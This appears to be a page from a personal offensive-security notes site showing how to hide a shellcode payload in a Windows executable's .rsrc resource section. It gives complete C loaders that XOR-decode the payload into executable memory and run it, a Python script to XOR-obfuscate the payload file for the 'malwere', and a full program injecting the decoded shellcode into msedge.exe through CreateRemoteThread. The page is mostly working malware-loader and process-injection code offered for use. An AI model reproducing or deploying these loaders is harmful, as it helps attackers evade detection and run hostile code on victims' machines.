Rsrc Placement Payload

1 - First Version Of Code

this code Copy Payload From .rsrc to TmpBuffer Useing "HeapAlloc" Addr in Memory

#include <Windows.h>
#include <stdio.h>
#include "resource.h"

int main() {

    HRSRC   hRsrc        = NULL;
    HGLOBAL hGlobal      = NULL;
    PVOID   pPayloadAddr = NULL;
    SIZE_T  sPayloadSize = NULL;

    hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
    if (hRsrc == NULL) {
        printf("[!] There is a problem in hRsrc: %d\n", GetLastError());
        return -1;
    }

    hGlobal = LoadResource(NULL, hRsrc);
    if (hGlobal == NULL) {
        printf("[!] There is a problem in LoadResource: %d\n", GetLastError());
        return -1;
    }

    pPayloadAddr = LockResource(hGlobal);
    if (pPayloadAddr == NULL) {
        printf("[!] There is a problem in LockResource: %d\n", GetLastError());
        return -1;
    }

    sPayloadSize = SizeofResource(NULL, hRsrc);
    if (sPayloadSize == 0) {
        printf("[!] There is a problem in sPayloadSize: %d\n", GetLastError());
        return -1;
    }

    PVOID TmpBuffer = HeapAlloc(GetProcessHeap(), 0, sPayloadSize);
    if (TmpBuffer == NULL) {
        printf("[!] There is a problem in HeapAlloc: %d\n", GetLastError());
        return -1;
    }

    memcpy(TmpBuffer, pPayloadAddr, sPayloadSize);
    printf("[+] Suc To Move Payload From pPayloadAddr to TmpBuffer\n");

    printf("[+] TmpBuffer Addr : 0x%p\n", TmpBuffer);
    printf("[+] PayloadAddr: 0x%p\n", pPayloadAddr);
    printf("[+] PayloadSize: %d\n", sPayloadSize);

    // Free Mem Heap 
    HeapFree(GetProcessHeap(), 0, TmpBuffer);

    printf("[#] Memory freed successfully.\n");
    printf("[#] Press <Enter> to quit...");
    getchar();

    return 0;
}

2 - Second Version Of Code

We Can Do SomeThing

Xor Shell Code

We Can Xor Shell Code instead of Run Shell Code Directly

We Can Use VirtualAlloc Function

This Function To Allocate A memory and Execute it

this code Copy Payload From .rsrc to TmpBuffer Useing "VirtualAlloc" Addr in Memory And it Can Execute it :)


#include <Windows.h>
#include <stdio.h>
#include "resource.h"

void DecodeXorEncryption(PBYTE HexArray, SIZE_T HexArraySize, PBYTE Keys, SIZE_T KeysSize) {
    for (int i = 0; i < HexArraySize; i++) {
        HexArray[i] = HexArray[i] ^ Keys[i % KeysSize];
    }
}

int main() {

    unsigned char keys[] = { 0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7F, 0x71, 0x2C };

    HRSRC   hRsrc = NULL;
    HGLOBAL hGlobal = NULL;
    PVOID   pPayloadAddr = NULL;
    SIZE_T  sPayloadSize = NULL;

    hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
    if (hRsrc == NULL) {
        printf("[-] Failed to find resource.\n");
        return 1;
    }

    hGlobal = LoadResource(NULL, hRsrc);
    if (hGlobal == NULL) {
        printf("[-] Failed to load resource.\n");
        return 1;
    }

    pPayloadAddr = LockResource(hGlobal);
    if (pPayloadAddr == NULL) {
        printf("[-] Failed to lock resource.\n");
        return 1;
    }

    sPayloadSize = SizeofResource(NULL, hRsrc);
    if (sPayloadSize == 0) {
        printf("[-] Failed to get resource size.\n");
        return 1;
    }

    PVOID execBuffer = VirtualAlloc(NULL, sPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (execBuffer == NULL) {
        printf("[-] Failed to allocate memory for execBuffer.\n");
        return 1;
    }

    memcpy(execBuffer, pPayloadAddr, sPayloadSize);

    DecodeXorEncryption((PBYTE)execBuffer, sPayloadSize, keys, sizeof(keys));

    printf("[+] Data after XOR:\n");
    for (int i = 0; i < sPayloadSize; i++) {
        printf("%02X ", ((unsigned char*)execBuffer)[i]);
    }
    printf("\n");


    printf("[+] execBuffer Addr : 0x%p\n", execBuffer);
    printf("[+] PayloadAddr: 0x%p\n", pPayloadAddr);
    printf("[+] PayloadSize: %zu\n", sPayloadSize);

    printf("[#] Running Payload...\n");
    ((void(*)())execBuffer)();

    VirtualFree(execBuffer, 0, MEM_RELEASE);

    printf("[#] Memory freed successfully.\n");
    printf("[#] Press <Enter> to quit...");
    getchar();

    return 0;
}

Let's Explane the Code :)

1 - Xor Shell Code

void DecodeXorEncryption(PBYTE HexArray, SIZE_T HexArraySize, PBYTE Keys, SIZE_T KeysSize) {
    for (int i = 0; i < HexArraySize; i++) {
        HexArray[i] = HexArray[i] ^ Keys[i % KeysSize];
    }
}

2- This Is Xor Shell Code with Some Keys :

unsigned char keys[] = { 0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7F, 0x71, 0x2C };

3 - Python Code To Edit Calc.ico File To Xor it Before Put File in Malwere

```python
# Define the encryption keys
keys = [0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7f, 0x71, 0x2c]

# XOR encryption/decryption function
def xor_with_keys(data, keys):
    return bytes([b ^ keys[i % len(keys)] for i, b in enumerate(data)])

# File path for fav.ico
file_path = "calc.ico"

try:
    # Step 1: Read the binary data from the file
    with open(file_path, "rb") as file:
        original_data = file.read()

    # Step 2: Perform XOR on the data
    xor_data = xor_with_keys(original_data, keys)

    # Step 3: Write the XORed data back to the file
    with open(file_path, "wb") as file:
        file.write(xor_data)

    print(f"Successfully applied XOR and updated {file_path}!")

except FileNotFoundError:
    print(f"Error: {file_path} not found!")
except IOError as e:
    print(f"An I/O error occurred: {e}")

```

Now We Can Add Proc Injection :)

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include "resource.h"
#include <string.h>

void DecodeXorEncryption(PBYTE HexArray, SIZE_T HexArraySize, PBYTE Keys, SIZE_T KeysSize) {
    for (int i = 0; i < HexArraySize; i++) {
        HexArray[i] = HexArray[i] ^ Keys[i % KeysSize];
    }
}

PBYTE GetResourceData(SIZE_T* resourceSize) {
    HRSRC hRsrc = NULL;
    HGLOBAL hGlobal = NULL;
    PVOID pPayloadAddr = NULL;

    // Find the resource
    hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
    if (hRsrc == NULL) {
        printf("[-] Failed to find resource.\n");
        return NULL;
    }

    hGlobal = LoadResource(NULL, hRsrc);
    if (hGlobal == NULL) {
        printf("[-] Failed to load resource.\n");
        return NULL;
    }

    pPayloadAddr = LockResource(hGlobal);
    if (pPayloadAddr == NULL) {
        printf("[-] Failed to lock resource.\n");
        return NULL;
    }

    // Get the size of the resource
    *resourceSize = SizeofResource(NULL, hRsrc);
    if (*resourceSize == 0) {
        printf("[-] Failed to get resource size.\n");
        return NULL;
    }

    PBYTE pWritablePayload = (PBYTE)malloc(*resourceSize);
    if (pWritablePayload == NULL) {
        printf("[-] Failed to allocate memory for writable payload.\n");
        return NULL;
    }

    memcpy(pWritablePayload, pPayloadAddr, *resourceSize);
    return pWritablePayload;
}

int FindTarget(const char* ProcName) {
    HANDLE hSnapShot;
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    int pid = 0;

    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, pid);

    if (INVALID_HANDLE_VALUE == hSnapShot) {
        printf("[!] There is a problem in hSnapShot\n");
        return -1;
    }

    if (!Process32First(hSnapShot, &pe32)) {
        printf("[!] There is a problem in Process32First \n");
        CloseHandle(hSnapShot);
        return -1;
    }

    WCHAR wideProcName[MAX_PATH];
    MultiByteToWideChar(CP_UTF8, 0, ProcName, -1, wideProcName, MAX_PATH);

    while (Process32Next(hSnapShot, &pe32)) {
        if (lstrcmpiW(wideProcName, pe32.szExeFile) == 0) {
            pid = pe32.th32ProcessID;
            break;
        }
    }

    CloseHandle(hSnapShot);
    return pid;
}

int main() {
    unsigned char keys[] = { 0x84, 0x9A, 0x90, 0x8F, 0x90, 0x71, 0x62, 0x72, 0x82, 0x7F, 0x71, 0x2C };

    SIZE_T sPayloadSize = 0;
    PBYTE pWritablePayload = GetResourceData(&sPayloadSize);
    if (pWritablePayload == NULL) {
        return 1;
    }

    printf("------------------\n");
    printf("pWritablePayload : %p\n", pWritablePayload);
    printf("------------------\n");


    DecodeXorEncryption(pWritablePayload, sPayloadSize, keys, sizeof(keys));

    printf("[+] Data after XOR:\n");
    for (int i = 0; i < sPayloadSize; i++) {
        printf("%02X ", pWritablePayload[i]);
    }
    printf("\n");

    printf("[+] PayloadAddr: 0x%p\n", pWritablePayload);
    printf("[+] PayloadSize: %zu\n", sPayloadSize);

    printf("[#]--------Start Process Injection--------[#]\n");

    int targetPID = 0;
    targetPID = FindTarget("msedge.exe");
    printf("targetPID : %d\n", targetPID);
    if (targetPID == -1 || targetPID == 0) {
        printf("[-] Failed to find the target process.\n");
        free(pWritablePayload);
        return 1;
    }

    // Open the target process
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
    if (hProcess == NULL) {
        printf("[-] Failed to open the target process. Error: %lu\n", GetLastError());
        free(pWritablePayload);
        return 1;
    }

    // Allocate memory in the target process
    LPVOID remoteBuffer = VirtualAllocEx(hProcess, NULL, sPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (remoteBuffer == NULL) {
        printf("[-] Failed to allocate memory in the target process. Error: %lu\n", GetLastError());
        CloseHandle(hProcess);
        free(pWritablePayload);
        return 1;
    }

    // Write the payload to the target process
    if (!WriteProcessMemory(hProcess, remoteBuffer, pWritablePayload, sPayloadSize, NULL)) {
        printf("[-] Failed to write to the target process memory. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        free(pWritablePayload);
        return 1;
    }

    printf("[+] Created remoteBuffer successfully : 0x%p\n", remoteBuffer);

    // Create a remote thread in the target process
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    if (hThread == NULL) {
        printf("[-] Failed to create remote thread in the target process. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        free(pWritablePayload);
        return 1;
    }

    printf("[+] Remote thread created successfully.\n");

    // Wait for the remote thread to finish
    WaitForSingleObject(hThread, INFINITE);

    // Clean up
    CloseHandle(hThread);
    VirtualFreeEx(hProcess, remoteBuffer, 0, MEM_RELEASE);
    CloseHandle(hProcess);
    free(pWritablePayload);

    printf("[#] Memory freed successfully.\n");
    printf("[#] Press <Enter> to quit...");
    getchar();

    return 0;
}

Why We Used `malloc` First

Understanding the Resource Memory:
- When you load a resource using LoadResource and LockResource, the data is stored in a read-only memory section of your program. This is because resources (like your payload) are typically embedded in the executable file and loaded into memory as part of the program's initialization.
- Attempting to modify this memory (e.g., by applying XOR decryption) will result in an Access Violation (0xC0000005) because the memory is protected and not writable.
The Problem with Directly Using pPayloadAddr:
- pPayloadAddr points to the memory location of the resource, which is read-only.
- If you try to modify this memory directly (e.g., DecodeXorEncryption(pPayloadAddr, ...)), the program will crash because you're trying to write to a protected memory region.
Why malloc is Necessary:
- malloc allocates a new block of memory in the heap, which is writable by default.
- By copying the resource data (pPayloadAddr) into this newly allocated memory (pWritablePayload), you create a writable copy of the payload.
- Now, you can safely modify this copy (e.g., apply XOR decryption) without causing an Access Violation.

Previoussantacloud - intigriti NextLoad Resource Data From .Rsrc

Last updated 11 days ago